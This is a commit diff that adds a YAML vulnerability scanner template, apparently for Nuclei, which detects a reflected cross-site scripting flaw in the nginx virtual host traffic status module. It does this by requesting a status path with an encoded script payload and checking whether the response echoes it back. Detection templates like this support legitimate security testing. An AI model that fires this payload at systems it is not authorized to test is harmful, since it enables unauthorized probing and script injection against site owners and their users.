Nginx virtual host traffic status module XSS
https://github.com/vozlt/nginx-module-vts/issues/174patch-1
parent
b44f47c502
commit
99d78127ea
|
@ -0,0 +1,21 @@
|
|||
id: nginx-module-vts-xss
|
||||
|
||||
info:
|
||||
name: Nginx virtual host traffic status module Reflected Cross-site Scripting
|
||||
author: madrobot
|
||||
severity: medium
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/status%3E%3Cscript%3Ealert(31337)%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(31337)</script>"
|
||||
part: body
|
Loading…
Reference in New Issue